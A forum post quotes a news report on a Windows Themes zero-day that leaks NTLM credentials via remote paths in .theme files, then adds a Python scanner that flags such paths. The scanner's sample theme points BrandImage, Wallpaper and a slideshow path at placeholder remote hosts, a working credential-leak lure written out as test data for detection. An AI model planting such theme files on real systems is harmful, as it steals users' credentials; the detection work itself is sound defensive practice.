Gandalf_The_Grey (thread author)
Free unofficial patches are now available for a new Windows Themes zero-day vulnerability that allows attackers to steal a target's NTLM credentials remotely.
NTLM has been extensively exploited in NTLM relay attacks, where threat actors force vulnerable network devices to authenticate against servers under their control, and pass-the-hash attacks, where they exploit system vulnerabilities or deploy malicious software to acquire NTLM hashes (which are hashed passwords) from targeted systems.
Once they have the hash, the attackers can authenticate as the compromised user, gaining access to sensitive data and spreading laterally on the now-compromised network. One year ago, Microsoft announced that it plans to kill off the NTLM authentication protocol in Windows 11 in the future.
ACROS Security researchers discovered the new Windows Themes zero-day (which has not yet been assigned a CVE ID) while developing a micropatch for a security issue tracked as CVE-2024-38030 that could leak a user's credentials (reported by Akamai's Tomer Peled), itself a bypass for another Windows Themes spoofing vulnerability (CVE-2024-21320) patched by Microsoft in January.
Peled found that "when a theme file specified a network file path for some of the theme properties (specifically BrandImage and Wallpaper), Windows would automatically send authenticated network requests to remote hosts, including user's NTLM credentials when such theme file would be viewed in Windows Explorer."
"This meant that merely seeing a malicious theme file listed in a folder or placed on the desktop would be enough for leaking user's credentials without any additional user action," ACROS Security CEO Mitja Kolsek said.
Even though Microsoft patched CVE-2024-38030 in July, ACROS Security found another issue attackers could exploit to steal a target's NTLM credentials on all fully updated Windows versions, from Windows 7 to Windows 11 24H2.
"So instead of just fixing CVE-2024-38030, we created a more general patch for Windows themes files that would cover all execution paths leading to Windows sending a network request to a remote host specified in a theme file upon merely viewing the file," Kolsek added.
Source: "New Windows Themes zero-day gets free, unofficial patches", www.bleepingcomputer.com
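Added example, not code from the article, ACROS Security, Akamai or Microsoft: a small Python scanner for .theme files that flags the two properties the article names, BrandImage (in [Theme]) and Wallpaper (in [Control Panel\Desktop]), when their value points at a remote host, and separately reports any other property carrying a UNC path or URL. A .theme file is an INI file, so the standard configparser handles it. The sample theme, its host names, the remote-path heuristic and the assumption that a legitimate theme has no reason to reference a remote host are all this example's own, not findings from the article.

```python
"""Scan Windows .theme files for properties that reference a remote host.

Constructed example: the article says Explorer resolves network paths in
BrandImage and Wallpaper with an authenticated request, leaking NTLM
credentials on mere viewing. This scanner finds such files before they
are rendered; the remote-path heuristic and the "other" category are
assumptions of this example, not a statement of exactly which properties
Windows fetches.
"""
import configparser
import re
from typing import List, Tuple

# (section, key) pairs the article names, compared case-insensitively.
KNOWN_SENSITIVE = {
    ("theme", "brandimage"),
    ("control panel\\desktop", "wallpaper"),
}

# UNC path (\\host\...), forward-slash UNC (//host/...), or any URL scheme.
# \\?\ and \\.\ are local device/extended-length prefixes, not hosts, so
# they are excluded by the negative lookahead.
_REMOTE_RE = re.compile(
    r"^(\\\\(?![?.]\\)[^\\\s]+|//[^/\s]+|[a-z][a-z0-9+.-]*://)",
    re.IGNORECASE,
)


def is_remote_path(value: str) -> bool:
    """True when a theme property value would be resolved on another host."""
    return bool(_REMOTE_RE.match(value.strip().strip('"')))


def scan_theme(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (severity, section, key, value) for every remote reference.

    severity is "known" for the two properties the article names and
    "other" for any other property whose value is a remote path
    (assumption: a theme has no legitimate reason to reference a host).
    Keys come back lower-cased because configparser normalises them.
    """
    # interpolation=None: theme values contain %SystemRoot%, which would
    # otherwise be treated as an interpolation marker.
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    findings = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if not is_remote_path(value):
                continue
            known = (section.lower(), key.lower()) in KNOWN_SENSITIVE
            findings.append(("known" if known else "other", section, key, value))
    return findings


# Constructed sample theme; the hosts are placeholders, not real systems.
SAMPLE_THEME = r"""
; Constructed sample, not a real malicious file.
[Theme]
DisplayName=Corporate Theme
BrandImage=\\10.0.0.5\share\brand.png

[Control Panel\Desktop]
Wallpaper=\\files.example.test\pics\wall.jpg
Pattern=
WallpaperStyle=10

[Slideshow]
ImagesRootPath=//files.example.test/pics

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""


def main() -> None:
    for severity, section, key, value in scan_theme(SAMPLE_THEME):
        print(f"[{severity}] [{section}] {key} = {value}")


if __name__ == "__main__":
    main()
```

Running this over a directory of .theme files (for example a shared Downloads folder or a file share users browse) finds staged files before Explorer renders them; it does not replace the patch, which closes the rendering path itself, and an attacker can still name a remote host in a property this heuristic does not cover if Windows fetches it.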